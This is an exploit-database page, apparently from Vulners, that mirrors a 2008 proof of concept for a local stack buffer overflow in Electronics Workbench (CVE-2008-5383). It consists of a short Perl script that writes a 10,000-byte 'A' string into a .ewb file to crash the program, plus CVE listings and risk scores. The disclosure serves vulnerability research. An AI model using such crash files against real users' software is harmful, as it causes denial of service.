Lucene search
+L

Electronics Workbench - '.ewb' Local Stack Overflow (PoC)

🗓️ 30 Nov 2008 00:00:00Reported by ZigmaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 56 Views

.EWB Local Stack Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5383
30 Nov 200800:00
circl
cve
CVE
CVE-2008-5383
9 Dec 200800:00
cve
cvelist
Cvelist
CVE-2008-5383
9 Dec 200800:00
cvelist
euvd
EUVD
EUVD-2008-5360
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5383
9 Dec 200800:30
nvd
prion
Prion
Stack overflow
9 Dec 200800:30
prion
#!/usr/local/bin/perl
#
#
# OOO OOO             OO                            OOO
#  O   O               O                           O   O
#  O   O               O                           O   O
#  O   O  OO OO    OOOOO   OOOOO  OOO OO  OOOOOO   O   O  OO OO    OOOOO
#  O   O   OO  O  O    O  O     O   OO  O O   O    O   O   OO  O  O     O
#  O   O   O   O  O    O  OOOOOOO   O        O     O   O   O   O  OOOOOOO
#  O   O   O   O  O    O  O         O       O      O   O   O   O  O
#  O   O   O   O  O    O  O     O   O      O   O   O   O   O   O  O     O
#   OOO   OOO OOO  OOOOOO  OOOOO  OOOOO   OOOOOO    OOO   OOO OOO  OOOOO
#
# [+] Application               : Electronics Workbench
#
# [+] Application's Description : (" Electronics Workbench sets the standard for affordable simulators.
#                                    The tight integration of its schematic editor, SPICE simulator and
#                                    on-screen waveforms makes what-if scenarios easy and instant.
#                                    The exceptional features of this latest release will come as no
#                                    surprise to our 80,000 previous customers. Value, power and ease of
#                                    use are what Electronics Workbench has always stood for.")
#
# [+] Bug                       : Local .EWB File Stack Buffer Overflow (PoC)
#
# [+] Author                    : Underz0ne Crew
#                                 Zigma
#
# I just got the program from my Elctronic's professor , Instead of simulating my homework I fuzzed it , I think I m geek :S , whatever
#
$filename = "fuzz.ewb";

$overflow = "A" x 10000;

print "\n\n[+] Evil file to fuzz : $filename ...\r\n";
sleep(2);

open(ewb, ">./$filename") || die "\nCannot open $filename: $!";

print ewb "$overflow";

close (ewb);

print "\n[+]  file successfully created!\r\n";

# milw0rm.com [2008-11-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.04713
56